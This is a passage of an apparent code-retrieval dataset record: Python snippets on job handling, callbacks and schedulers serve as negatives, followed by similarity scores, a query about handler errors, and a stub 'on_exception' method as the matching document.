subfoldername = md5_key[:2]\n md5_subfolder = \"%s/%s\"%(path_cache, subfoldername)\n cachedir = \"%s/%s/%s\"%(path_cache, subfoldername, md5_key)\n\n # copy the zipped folder to the cache path\n origpath = os.getcwd()\n os.chdir(outpath_result)\n shutil.copytree(\"seq_%d\"%(origIndex), md5_key)\n cmd = [\"zip\", \"-rq\", \"%s.zip\"%(md5_key), md5_key]\n webcom.RunCmd(cmd, runjob_logfile, runjob_errfile)\n if not os.path.exists(md5_subfolder):\n os.makedirs(md5_subfolder)\n shutil.move(\"%s.zip\"%(md5_key), \"%s.zip\"%(cachedir))\n shutil.rmtree(md5_key) # delete the temp folder named as md5 hash\n os.chdir(origpath)\n\n # Add the finished date to the database\n date_str = time.strftime(g_params['FORMAT_DATETIME'])\n MAX_TRY_INSERT_DB = 3\n cnttry = 0\n while cnttry < MAX_TRY_INSERT_DB:\n t_rv = webcom.InsertFinishDateToDB(date_str, md5_key, seq, finished_date_db)\n if t_rv == 0:\n break\n cnttry += 1\n time.sleep(random.random()/1.0)\n\n# }}}\n elif status in [\"Failed\", \"None\"]:\n # the job is failed for this sequence, try to resubmit\n isFinish_remote = True\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: %s, status = %s\\n\"%(remote_jobid, status), gen_logfile)\n\n if status != \"Wait\" and not os.path.exists(starttagfile):\n webcom.WriteDateTimeTagFile(starttagfile, runjob_logfile, runjob_errfile)\n\n if isSuccess: # {{{\n time_now = time.time()\n runtime1 = time_now - submit_time_epoch # in seconds\n timefile = os.path.join(outpath_this_seq, \"time.txt\")\n runtime = webcom.ReadRuntimeFromFile(timefile, default_runtime=runtime1)\n info_finish = webcom.GetInfoFinish(\n name_server, outpath_this_seq,\n origIndex, len(seq), description,\n source_result=\"newrun\", runtime=runtime)\n finished_info_list.append(\"\\t\".join(info_finish))\n finished_idx_list.append(str(origIndex))\n # }}}\n\n # if the job is finished on the remote but the prediction is failed,\n # try resubmit a few times and if all failed, add the origIndex to the\n # failed_idx_file\n if isFinish_remote and not isSuccess:\n cnttry = 1\n try:\n cnttry = cntTryDict[int(origIndex)]\n except KeyError:\n cnttry = 1\n if cnttry < g_params['MAX_RESUBMIT']:\n resubmit_idx_list.append(str(origIndex))\n cntTryDict[int(origIndex)] = cnttry+1\n else:\n failed_idx_list.append(str(origIndex))\n\n if not isFinish_remote:\n time_in_remote_queue = time.time() - submit_time_epoch\n # for jobs queued in the remote queue more than one day (but not\n # running) delete it and try to resubmit it. 
This solved the\n # problem of dead jobs in the remote server due to server\n # rebooting)\n if (\n status != \"Running\"\n and status != \"\"\n and time_in_remote_queue > g_params['MAX_TIME_IN_REMOTE_QUEUE']):\n # delete the remote job on the remote server\n try:\n rtValue2 = myclient.service.deletejob(remote_jobid)\n except Exception as e:\n webcom.loginfo(\"Failed to run myclient.service.deletejob(%s) on node %s with msg %s\"%(remote_jobid, node, str(e)), gen_logfile)\n rtValue2 = []\n pass\n else:\n keep_queueline_list.append(line)\n# }}}\n # Finally, write log files\n finished_idx_list = list(set(finished_idx_list))\n failed_idx_list = list(set(failed_idx_list))\n resubmit_idx_list = list(set(resubmit_idx_list))\n\n if len(finished_info_list) > 0:\n myfunc.WriteFile(\"\\n\".join(finished_info_list)+\"\\n\", finished_seq_file,\n \"a\", True)\n if len(finished_idx_list) > 0:\n myfunc.WriteFile(\"\\n\".join(finished_idx_list)+\"\\n\", finished_idx_file,\n \"a\", True)\n if len(failed_idx_list) > 0:\n myfunc.WriteFile(\"\\n\".join(failed_idx_list)+\"\\n\", failed_idx_file, \"a\",\n True)\n if len(resubmit_idx_list) > 0:\n myfunc.WriteFile(\"\\n\".join(resubmit_idx_list)+\"\\n\", torun_idx_file,\n \"a\", True)\n\n if len(keep_queueline_list) > 0:\n keep_queueline_list = list(set(keep_queueline_list))\n myfunc.WriteFile(\"\\n\".join(keep_queueline_list)+\"\\n\",\n remotequeue_idx_file, \"w\", True)\n else:\n myfunc.WriteFile(\"\", remotequeue_idx_file, \"w\", True)\n\n with open(cnttry_idx_file, 'w') as fpout:\n json.dump(cntTryDict, fpout)\n\n return 0", "def handle_result(self,result,event):\r\n # If the result is a number, according to the design we\r\n if isinstance(result,(int,float)):\r\n event.time=self.time+result\r\n # Hint: The reason which this event is added back to the queue is because the function executed is a generator.\r\n # That is to say, that function used a \"yield\" command. In the first round of execution, it yields the delay\r\n # time. Then, the event is added back to the queue to be executed the second time. In the second round, the\r\n # execution starts from where it left off in the first round. If you are not familiar with the concept of\r\n # generator, this is confusing. I was confused for a while. 
I recommend you figure out what a generator is\r\n # first.)-->\r\n self.add_event(event)\r\n # If the result is a dictionary,\r\n elif isinstance(result,dict):\r\n event.time=self.time+result.get('delay',0)\r\n event.priority=result.get('priority',event.priority)\r\n # If you are confused about why this event is added back to the queue, please refer to the above hint.\r\n self.add_event(event)\r\n elif isinstance(result,(str,Trigger)):\r\n event.time=None\r\n if result not in self.triggers:\r\n # Here we add function executions to the self.triggers dictionary.\r\n self.triggers[result]=[event]\r\n else:\r\n self.triggers[result].append(event)\r\n elif isinstance(result,(list,tuple)):\r\n events=[copy.copy(event) for r in result]\r\n for e in events: e.group=events\r\n for i,r in enumerate(result):\r\n self.handle_result(r,events[i])\r\n elif result is None:\r\n if event.parent is not None:\r\n event.parent.time=self.time\r\n self.add_event(event.parent)\r\n elif isinstance(result,Event):\r\n if result.generator and event.generator:\r\n result.parent=event\r\n elif hasattr(result,'default_trigger'):\r\n self.handle_result(result.default_trigger,event)\r\n else:\r\n raise SchedulerError(\"Incorrect 'yield': %s\"%(result))", "async def test_job_done(my_job):\n\n # Set up callback to get notifications when job state changes.\n job = None\n job_update_counter = 0\n\n def on_job_update(_job):\n \"\"\"The callback updates `job` and `job_update_counter`.\"\"\"\n nonlocal job, job_update_counter\n job = _job\n job_update_counter += 1\n # Assert that simple job is reported as cancelable only when it\n # is in the `PENDING` or `CANCELING` state.\n if job.state in ['PENDING', 'CANCELING']:\n assert job.is_cancelable, ( # pylint: disable=no-member\n 'Job is not cancelable when it must be cancelable!')\n else:\n assert not job.is_cancelable, ( # pylint: disable=no-member\n 'Job is cancelable when it must not be cancelable!')\n\n my_job.set_on_update(on_job_update)\n\n # Submit a job which must finish OK.\n new_job = await my_job.job(mustfail=False)\n\n # Check job instance of new job (returned from job function).\n assert new_job.is_cancelable, ( # pylint: disable=no-member\n 'Job instance states that just submitted job is not cancelable!')\n assert new_job.state == 'PENDING'\n assert new_job.id is not None\n assert new_job.started is None\n assert new_job.args == []\n assert new_job.kwds == {'mustfail': False}\n assert new_job.message == ''\n assert new_job.payload == {}\n assert new_job.readiness is None\n\n # Check current job state right after job is submitted.\n assert job.state == 'PENDING', ('Just submitted job has wrong state '\n f'`{job.state}`!')\n\n # Process ASGI messages and wait for the job to finish.\n await my_job.process_jobs()\n\n # Check job state when job is done.\n assert job.state == 'DONE', f'Finished job has wrong state `{job.state}`!'\n\n # Check that job update callback has been called three times:\n # 1. job is submitted\n # 2. job switches to the working state\n # 3. 
job finishes\n assert job_update_counter == 3, 'Job updated wrong number of times!'", "def put_external_result(self, job_result):\n self.result_queue.append(job_result)", "def _handle_task_not_succeeded(self):\n result = self.async_result.result\n\n if isinstance(result, exceptions.OperationRetry):\n # operation explicitly requested a retry, so we ignore\n # the handler set on the task.\n handler_result = HandlerResult.retry()\n handler_result.retry_after = result.retry_after\n return handler_result\n\n if self.is_subgraph:\n self.error = self.failed_task.error\n\n if self.on_failure:\n handler_result = self.on_failure(self)\n else:\n handler_result = HandlerResult.retry()\n\n if isinstance(result, exceptions.NonRecoverableError):\n handler_result = HandlerResult.fail()\n elif isinstance(result, exceptions.RecoverableError):\n handler_result.retry_after = result.retry_after\n\n return handler_result", "def _is_job_finished(self, job_id):\n complete, rc, status, result, task = False, 0, None, None, None\n job = self.get_job_by_id(job_id)\n if job:\n status = job['status']\n try:\n result, task = job['result'], job['task']\n except KeyError:\n pass\n if status.lower() == SUCCEEDED:\n complete = True\n elif status.lower() in INCOMPLETE_LIST:\n complete = False\n else:\n rc, complete = -1, True\n return complete, result, rc, status, task", "def isFinished(self):\r\n try:\r\n output = Popen(\"qstat | grep \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n if self.jobId in output:\r\n if output.split()[4] == \"Eqw\":\r\n #If the job fails, print a warning, and wait a minute so the user can check why the job fails,\r\n #before resubmitting the job.\r\n logging.warning(\"job \" + output.split()[2] + \" failed to run, resubmitting in one minute\")\r\n time.sleep(60)\r\n output = Popen(\"qdel \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n self.submit()\r\n return False\r\n else:\r\n logging.info(\"job with ID: \" + self.jobId + \" is finished.\")\r\n return True\r\n \r\n except ValueError:\r\n logging.info(\"Error: waiting for not submitted job...\")", "def process_result(self, result: Any) -> None:\n raise NotImplementedError()", "def process(self, job_id, job_service):\n print('Monitoring job %s' % job_id)\n local_job = Job.query.get(job_id)\n remote_job = job_service.get_job(local_job.remote_job_id)\n\n # TODO: catch saga.IncorrectState\n remote_job_state = remote_job.state\n\n if local_job.last_status != remote_job_state:\n self.send_notifications(local_job, remote_job)\n self.download_files(local_job, remote_job, job_service)\n self.update_state(local_job, remote_job)\n\n # Add task back to the queue if still running\n if remote_job_state not in (saga.FAILED,\n saga.DONE,\n saga.CANCELED,\n saga.FINAL,\n saga.EXCEPTION):\n self.send((job_id, job_service))", "def v2_runner_on_ok(self, result, **kwargs):\n host = result._host\n task = result._task\n output = result._result\n if result._result.get('changed', False):\n status = 'changed'\n else:\n status = 'ok'\n self.results.append({\"host\": host.name, \"action\":task.action, \"status\":status, \"output\": output})", "def process(self):\n return self.check()", "def test_setting_result_fires_signal(self):\n # Remember both new and old result for verification\n new_result = make_job_result()\n old_result = self.job_state.result\n\n def changed_callback(old, new):\n # Verify that new and old are correct and not swapped\n self.assertIs(new, new_result)\n self.assertIs(old, old_result)\n # Set a flag 
that we verify below in case this never gets called\n self.on_changed_fired = True\n # Connect the signal handler\n self.job_state.on_result_changed.connect(changed_callback)\n # Assign the new result\n self.job_state.result = new_result\n # Ensure that the signal was fired and called our callback\n self.assertTrue(self.on_changed_fired)", "def on_failure(self):\n if self.args.disable_rollback is True:\n on_failure = None\n else:\n on_failure = self.args.on_failure\n return on_failure", "def process_image(self, **kwargs):\n try:\n img = self.current_image\n\n if self.is_vis:\n result = self._process_job_vis(img, **kwargs)\n elif self.is_nir:\n result = self._process_job_nir(img, **kwargs)\n elif self.is_fluo:\n result = self._process_job_fluo(img, **kwargs)\n else:\n raise NotImplementedError\n\n except Exception as e:\n print(\n 'Failed to process image: \"{}\", because \"{}\"'.format(\n self.file_path, repr(e)\n )\n )\n self.print_images()\n return False\n\n self.print_images()\n\n return result", "def run(self):\n\n try:\n self.send_alert('SUCCESS', \"Job START\", None)\n self.cron_process()\n self.send_alert('SUCCESS', \"Job FINAL\", None)\n sys.exit(0)\n\n except Exception:\n alert_data = self.build_error_output()\n self.send_alert('FAILURE', 'Failure during Job', alert_data)\n sys.exit(1)", "def _success_handler(details):\n LOGGER.debug('[Backoff]: Completed after %d tries calling %s',\n details['tries'],\n details['target'].__name__)", "def test_calls_error_callback(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n call_count = []\n handle_count = []\n\n def handle_success():\n call_count.append(1)\n\n def handle_errors():\n handle_count.append(1)\n\n work = Async(target=dir, args=[1, 2],\n callbacks={'success': handle_success,\n 'error': handle_errors})\n\n with _ExecutionContext(work):\n run_job()\n\n self.assertEqual(1, len(handle_count),\n \"Error handler called wrong number of times.\")\n self.assertEqual(0, len(call_count),\n \"Success handler unexpectedly called.\")", "def on_job_result(self, job, result):\n job_id = job.tag\n parities = result.histogram(key='out',\n fold_func=lambda bits: np.sum(bits) % 2)\n self._zeros[job_id] += parities[0]\n self._ones[job_id] += parities[1]", "async def execute(self):\n return True", "async def execute(self):\n return True" ]
[ "0.6380917", "0.630514", "0.6203368", "0.6140142", "0.6020525", "0.5998409", "0.5967726", "0.5962727", "0.59392214", "0.59327286", "0.59168214", "0.59048873", "0.5869822", "0.5861403", "0.58348876", "0.57895267", "0.57549196", "0.5748723", "0.5741472", "0.5715548", "0.5704743", "0.5670206", "0.56546664", "0.56533074", "0.56120205", "0.5581982", "0.5580021", "0.5554732", "0.55489725", "0.5546846", "0.554489", "0.5513459", "0.5512138", "0.55061173", "0.5501268", "0.5498488", "0.5459026", "0.5457164", "0.54485667", "0.5444492", "0.54236156", "0.5422567", "0.5419994", "0.541954", "0.5407903", "0.5394093", "0.53930146", "0.5382794", "0.53734446", "0.53599507", "0.5359034", "0.535374", "0.5351571", "0.53488684", "0.5348177", "0.5345735", "0.5330472", "0.5327798", "0.5326435", "0.5318468", "0.53160596", "0.5309246", "0.53068095", "0.5290059", "0.5288236", "0.52686816", "0.52665615", "0.5259302", "0.5252993", "0.52525884", "0.52469087", "0.5242887", "0.5238433", "0.5238101", "0.5235252", "0.52304727", "0.52295136", "0.5227828", "0.52178085", "0.52175045", "0.52168506", "0.5210493", "0.5200998", "0.51972693", "0.5196555", "0.5190261", "0.5185853", "0.51806873", "0.5178186", "0.51737106", "0.5173497", "0.5168346", "0.51611906", "0.5160417", "0.5158301", "0.51582515", "0.515617", "0.5155603", "0.5155496", "0.5154296", "0.5154296" ]
0.0
-1
Called when handler returns True
def on_success(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def handler(self, *args, **kwargs):\n return True", "def on_success(self) -> None:", "def handle(self) -> None:", "def ok_callback(self):\n pass", "def event_handler(self, response):\n pass", "def justhandle(self, rawdata):\r\n\r\n return self.__handler(rawdata)", "def response(self, context, message):\r\n return True", "def handle(self):", "async def _response_handler(self):", "def query_handler(self, handler_name=\"\"):\n\t\treturn False", "def OnSuccess(self):\n pass", "def dummy_callback_handler(self, ret):\n pass", "def handle_once(self):\n return self.__handle_once", "def callback(self):\n pass # pragma: no cover", "def handleContentComplete():", "def handler(self):\n\t\treturn self.handle_request", "def _handle(self, *args, **options):\n return super()._handle(*args, **options)", "def onDone(self):\n pass", "def add_handler(self, handler):\n pass", "def on_response(self, response):\n pass", "def handle(self, data):\n pass", "def post_execute(self):", "def PostExecute(self):\n return True", "def register_handler(self, handler):\r\n self.handler = handler", "def on(self) -> None:", "def _handler_changed(self, handler):\n if self.next is not None:\n self.next.handler = handler", "def handle(self, rawdata):\r\n\r\n return self.__filter(self.__handler(rawdata))", "def run_handler(self, handler):\n self.last_activity = time.time()\n const_name = handler.upper()\n try:\n const_value = getattr(cwiid, const_name)\n if self.wm.state['buttons'] == const_value:\n self.exec_script(handler)\n except AttributeError:\n return 0", "def process(self):\n return False", "def on_event(self, evt):\n\t\treturn False", "def _handle_task_succeeded(self):\n if self.on_success:\n return self.on_success(self)\n else:\n return HandlerResult.cont()", "def handle(self, message):", "def prepare(self):\n return HandlerReady()", "def ok_callback(self):\n self.rokucontrol.ok_callback()", "def _on_connection_success(self):\n if self.connect_handler:\n self.connect_handler()", "def done(self):", "def done(self):", "def on(self):", "def on_finish(self):", "def handle_event(self, event):", "def on(self) -> None:\n ...", "def error(self, handler):\n pass", "def on_event_finished(self, event):", "def callback(self):\n try:\n function()\n finally:\n main_loop.remove_handler(handler[0])", "def handler(self):\n\t\tself.exitClient()", "def unhandled(self):\n return True", "def consume(self, handler) -> None:\n pass # pragma: no cover", "def on_run(self):\r\n\r\n\t\tpass", "def handle_event(self, event):\n pass", "def done(self):\n return False", "def dispatch_any(self, request, handler, *args, **kwargs):\r\n return handler(request, *args, **kwargs)", "def proceed(self):\n pass", "def handler_ready(self, handler):\n logging.info(\"Handler ready %s\", handler.name())\n key = handler.rpc_key[6:]\n if handler.rpc_key.startswith(\"server:\"):\n pool_src, pool_dst = self._client_pool, self._server_pool\n timeout = self.timeout_server\n else:\n pool_src, pool_dst = self._server_pool, self._client_pool\n timeout = self.timeout_client\n\n if key in pool_src:\n self._pair_up(pool_src.pop(key), handler)\n return\n elif key not in pool_dst:\n pool_dst[key] = handler\n def cleanup():\n \"\"\"Cleanup client connection if timeout\"\"\"\n if pool_dst.get(key, None) == handler:\n logging.info(\"Timeout client connection %s, cannot find match key=%s\",\n handler.name(), key)\n pool_dst.pop(key)\n handler.send_data(struct.pack('@i', RPC_MAGIC + 2))\n handler.signal_close()\n self.loop.call_later(timeout, cleanup)\n else:\n 
logging.info(\"Duplicate connection with same key=%s\", key)\n handler.send_data(struct.pack('@i', RPC_MAGIC + 1))\n handler.signal_close()", "def _finished(self) -> None:", "def test_updated_handler_called(self):\n self.client.ensure_path(\"/services/db/1.1.1.1\")\n self.client.set(\"/services/db/1.1.1.1\",\n json.dumps({\"enabled\": \"1\"}))\n handler = Mock()\n z = ZkFarmExporter(self.client, \"/services/db\", self.conf, handler)\n z.loop(2, timeout=self.TIMEOUT)\n self.client.set(\"/services/db/1.1.1.1\",\n json.dumps({\"enabled\": \"0\"}))\n z.loop(1, timeout=self.TIMEOUT)\n handler.assert_called_once_with()", "def after_send(self):", "def set_handler(self, handler):\n self.next_handler = handler", "def done(self) -> bool:", "def on_response(self, response):\n log.debug(\"Received response: %s\", response)", "def handle(self):\n raise NotImplementedError", "def _is_done(self):\n pass", "def connection_handler(self):\n\t\tyield", "def __handle(self):\n\n if not self.entrada.closed:\n linea = self.salida.readline()\n tamanio = None\n\n if linea:\n #if 'Playing' in linea:\n # self.uri = linea.split()[-1]\n\n if 'dump:' in linea:\n tamanio = int(int(linea.split()[1]) / 1024)\n\n if self.uri and tamanio:\n uri = self.uri\n if len(self.uri) > 25:\n uri = str(self.uri[0:25]) + \" . . . \"\n\n info = \"Grabando: %s - %s Kb\" % (\n uri, str(tamanio))\n\n if self.info != info:\n self.info = info\n self.emit('update', self.info)\n\n return True", "def handle_accept(self):\r\n pass", "def _hook(self):", "def _handler_direct_access_exit(self, *args, **kwargs):", "def process(self, event):\n pass", "def on_finish(self):\n pass", "def make_new_handler(self, *args, **kwargs):", "def handle_success_request(self) -> HttpResponse:\n raise NotImplementedError", "def bofore_response_handle(self, func):\n self.before_response.append(func)\n return func", "def onfinish():", "def handle(event={}, context={}):\n LoLServerStatusHandler().run()\n return 'ok'", "def on_run(self):\n pass", "def on_hook(self) -> None:", "def action_done(self):", "def responseHandler(self, factory):\n pass", "def onfinish( request ):", "def onfinish( request ):", "def _onOk(self):\n\n self.accepted = True\n self.close()", "def _onOk(self):\n\n self.accepted = True\n self.close()", "def _do_action(self, handler: 'Handler') -> CanDo:\n pass", "def _on_message(self, raw_msg):\n strmsg = raw_msg.decode()\n msg = json.loads(strmsg)\n\n print(msg)\n\n if self._handlers.get(msg['msgid']):\n for handler in self._handlers[msg['msgid']]:\n handler.handle(msg)", "def handle_response(self):\r\n call_if_not_none_and_callable(self._eventHandlers.popleft(),\r\n response=self.response)", "def request() -> None:\n\t_flag.set()", "def handleEvent(self, event):\n pass", "def perform_callback(self, *args, **kwargs):\n pass", "def action_done(self):\n pass", "def finished(self):", "def handle(self, *args, **kwargs):\n raise NotImplementedError()", "def callback(self, *args):\n raise NotImplementedError()", "def process_server_response(self, server_response):", "def acknowledged(self):\n ...", "def _signal_handler(*args):\n self._user_exit = True", "def responder():\n pass", "def finished(self, reply):\n pass", "def process_event(self, event):\r\n pass", "def process(self, msg):\n print \"HANDLER: received a msg: %s\" % msg", "def _handle_request(self, method, url, handler):\n if not(method in self.handlers):\n handler.set_status(405) # Method Not Allowed\n handler.write({})\n return\n for (path, fn) in self.handlers[method].items():\n if re.match(path, 
url):\n fn(url, handler)\n return\n handler.set_status(404) # Not Found\n handler.write({})", "def next(self, event):\n self.result = 1" ]
[ "0.8078143", "0.6831724", "0.6803624", "0.6726275", "0.67239153", "0.67041284", "0.66923994", "0.6612446", "0.659153", "0.6590828", "0.6533328", "0.6532542", "0.6480587", "0.6457898", "0.63366073", "0.6306607", "0.63060313", "0.6250639", "0.62399155", "0.62257975", "0.6218537", "0.62135744", "0.6208803", "0.61905444", "0.6188409", "0.61707354", "0.6170192", "0.6163955", "0.61437315", "0.6090287", "0.60897756", "0.6087602", "0.60763055", "0.6059096", "0.6048846", "0.60362226", "0.60362226", "0.60259247", "0.600785", "0.60034657", "0.5991488", "0.5988472", "0.5985149", "0.5984868", "0.59792036", "0.5967051", "0.59615475", "0.5956799", "0.5956673", "0.5954524", "0.59363884", "0.59355295", "0.59218884", "0.5900156", "0.5889209", "0.5872656", "0.5863483", "0.58576584", "0.5850296", "0.58467865", "0.5846461", "0.5839647", "0.5833882", "0.58311594", "0.5826011", "0.5823318", "0.58227754", "0.5816027", "0.5812118", "0.5806703", "0.5799211", "0.57964087", "0.5778248", "0.5775059", "0.5771104", "0.5755413", "0.5744862", "0.57437074", "0.57437074", "0.5736968", "0.5736968", "0.57298017", "0.57247716", "0.5712043", "0.5708975", "0.57070845", "0.5706784", "0.57044786", "0.57021976", "0.5701135", "0.5698657", "0.56954247", "0.56949127", "0.5693889", "0.5693593", "0.56924033", "0.5689979", "0.5686046", "0.56834286", "0.5683103" ]
0.67066246
5
Called when handler returns False
def on_failure(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def handler(self, *args, **kwargs):\n return True", "def dummy_callback_handler(self, ret):\n pass", "def unhandled(self):\n return True", "def set_as_handled(self):\n self.not_handled = False", "async def unhandled_response(self, pkt, source):\n if False:\n yield None", "def handle_uncaught_event(self, event):\r\n if widget.Widget.handle_uncaught_event(self, event):\r\n app.App.handle_uncaught_event(self, event)\r\n return True\r\n return False", "def on_event(self, evt):\n\t\treturn False", "def justhandle(self, rawdata):\r\n\r\n return self.__handler(rawdata)", "def error(self, handler):\n pass", "def handle_response(self):\r\n call_if_not_none_and_callable(self._eventHandlers.popleft(),\r\n response=self.response)", "def _handler_direct_access_exit(self, *args, **kwargs):", "def on_access_deny(self, handler):\n print \"User with {0} has been DENIED access.\".format(\n handler.client_address[0]\n )\n time.sleep(2) # lets annoy user if it is denied access", "def remove_handler(self, handler):\n pass", "def query_handler(self, handler_name=\"\"):\n\t\treturn False", "def _handler_direct_access_exit(self, *args, **kwargs):\n pass", "def _handler_direct_access_exit(self, *args, **kwargs):\n pass", "def handle(self) -> None:", "def callback(self):\n try:\n function()\n finally:\n main_loop.remove_handler(handler[0])", "def halt_async_handle_updates(self):\n self._halt = True", "def process(self):\n return False", "async def _noop_error_handler(ctx: \"RequestContext\") -> None:", "def handle_disablehandler(bot, ievent):\n if not httpd:\n ievent.reply('webserver is not running')\n return\n try:\n handler = ievent.args[0]\n except IndexError:\n ievent.missing('<handler>')\n return\n try:\n del httpd.handlers[handler]\n if handler in cfg.get('showplugs'):\n cfg.remove('showplugs', handler)\n if handler not in cfg.get('denyplugs'):\n cfg.append('denyplugs', handler)\n ievent.reply('%s handler disabled' % handler)\n except KeyError:\n ievent.reply('%s handler is not enabled' % handler)", "def event_handler(self, response):\n pass", "def _nothing(): # pylint: disable=useless-return\n logger.debug(\"Popping Nothing browser\")\n return", "def _dummy_callback():\n assert False, \"TRESPASS - set_callback() must be called\"", "def response(self, context, message):\r\n return True", "def disable_for_loaddata(signal_handler):\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if not kwargs[\"raw\"]:\n signal_handler(*args, **kwargs)\n\n return wrapper", "def _handle(self, *args, **options):\n return super()._handle(*args, **options)", "def handle_uncaught_event(self, event):\r\n if self.get_visible():\r\n for i in self.widgets:\r\n if i.get_visible():\r\n if i.handle_uncaught_event(event):\r\n return True\r\n return False", "def ok_callback(self):\n pass", "def post_stop(self):", "def __empty_event_handler(self, govee, device, raw_data):\n\n pass", "def do_exit(self, _):\n return True", "def _disable(self):\n self.debug_log(\"Disabling...\")\n self._unregister_handlers()", "def handler(self):\n\t\tself.exitClient()", "def unhandled(self, *args):\n if self._context_response:\n # we asked a context-aware plugin to deal with the message, but it\n # did not\n self._context_dealt_with = False\n else:\n self.dec_handlers()", "def handle(self):", "def disable_for_loaddata(signal_handler):\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if kwargs.get('raw', None):\n return\n signal_handler(*args, **kwargs)\n return wrapper", "def prepost_hook_with_wrong_return_annotation(self) -> bool:\n 
pass", "def off_hook(self) -> None:", "def handle_err(self):\n pass", "def _signal_handler(*args):\n self._user_exit = True", "def handle_once(self):\n return self.__handle_once", "def disable_for_loaddata(signal_handler):\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if kwargs.get('raw'):\n return\n signal_handler(*args, **kwargs)\n\n return wrapper", "def callback(self):\n pass # pragma: no cover", "def on_exception(self):\n pass", "def cancel_callback(self):\n pass", "def on_cancel(self) -> None:\n pass", "def on_cancel(self) -> None:\n pass", "def disable_for_loaddata(signal_handler):\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if 'raw' in kwargs and kwargs['raw']:\n return\n signal_handler(*args, **kwargs)\n return wrapper", "def onDone(self):\n pass", "async def _response_handler(self):", "def handler(signum, frame):\n logging.warning(\"Got a {} signal. Doing nothing\".format(signum))", "def process_IN_CLOSE_NOWRITE(self, event):", "def disable_cmd_ended_cb(self, event):\n this_server = TangoServerHelper.get_instance()\n if event.err:\n log_msg = (\n f\"{const.ERR_INVOKING_CMD}{event.cmd_name}\\n{event.errors}\"\n )\n self.logger.error(log_msg)\n this_server.write_attr(\"activityMessage\", log_msg, False)\n else:\n log_msg = f\"{const.STR_COMMAND}{event.cmd_name}{const.STR_INVOKE_SUCCESS}\"\n self.logger.info(log_msg)\n this_server.write_attr(\"activityMessage\", log_msg, False)", "def done(self):\n return False", "def interrupt(self):\n return True", "def handle_close(self):\r\n self._connection_state = STATE_DISCONNECTED\r\n super(http_evented, self).handle_close()\r\n self._fail_all_pending_event_handlers()\r\n call_if_not_none_and_callable(self._onClose)", "def _audio_finished_handler(self):\n # Indicate that no audio is playing. 
\n self.audio_finished_event.set()\n self.player = None", "def _stop(self):\n return True", "def aborting(self):\n \n pass", "def disable(self) -> None:", "def lost(self):\r\n return None", "def rnfr_handler(self):\n if self.is_rnfr:\n pass # TODO delete value in is_rnfr\n self.is_rnfr = None", "def is_done():\n return False", "def disable(self):", "def signal_handler(self, signal_number, frame):\n sys.exit(0)", "def handle_event(self, event):\n pass", "def default_handler(signum: int, frame: Any, spinner: Yaspin) -> None: # pylint: disable=unused-argument\n spinner.fail()\n spinner.stop()\n sys.exit(0)", "def error_handler(self, handler):\n if not self.opened():\n handler = handler or util.noop\n self._error_handler = enums.JLinkFunctions.LOG_PROTOTYPE(handler)\n self._dll.JLINKARM_SetErrorOutHandler(self._error_handler)", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def handler_block(obj, handler_id): # reliably restored by inspect\n pass", "def __signalHandler(self, signalNumber, frame):\n self._loop = False", "def handle_expt(self):\r\n self._perform_on_error_handling()", "def unknown_event(self, event):\r\n pass", "def no_response(self):\n raise NotImplementedError", "def signal_handler(self, signum, frame):\n self._running = False", "def handle(self, data):\n pass", "def PostExecute(self):\n return True", "def on_response(self, response):\n pass", "def notEnabledDummy(self, ev):\n pass", "def handler(signum, frame):\n global keep_running\n keep_running = False", "def handler(signum, frame):\n global keep_running\n keep_running = False", "def dummy_method_silent(self):\n\n pass", "def handle_other(self):\n pass" ]
[ "0.72471005", "0.70438576", "0.690345", "0.6730309", "0.65689135", "0.65600246", "0.65534455", "0.6529977", "0.64647585", "0.62942225", "0.6265559", "0.62107646", "0.61744297", "0.614441", "0.61417645", "0.61417645", "0.6119187", "0.6103069", "0.6037326", "0.59561646", "0.5919832", "0.5913491", "0.5911413", "0.59048307", "0.58844966", "0.5882942", "0.585671", "0.5841731", "0.5840626", "0.5827266", "0.5804793", "0.58042383", "0.58001673", "0.57939774", "0.5793744", "0.57924044", "0.577767", "0.57768714", "0.5760614", "0.575869", "0.57515544", "0.57242525", "0.57241493", "0.57074535", "0.57010806", "0.5696107", "0.56929773", "0.5691519", "0.5691519", "0.5687981", "0.5683032", "0.5682441", "0.56810486", "0.56775445", "0.56758475", "0.56730187", "0.56636035", "0.56475353", "0.56425107", "0.56391734", "0.5634981", "0.5632374", "0.5616342", "0.5615682", "0.56123054", "0.560759", "0.5605202", "0.56046134", "0.5602114", "0.55868715", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.55851406", "0.5581849", "0.5559677", "0.5555527", "0.5549133", "0.5547418", "0.5546366", "0.5542142", "0.5539126", "0.55370027", "0.553652", "0.553652", "0.5534999", "0.55308855" ]
0.5970655
19
Called when handler raises an error
def on_exception(self): pass
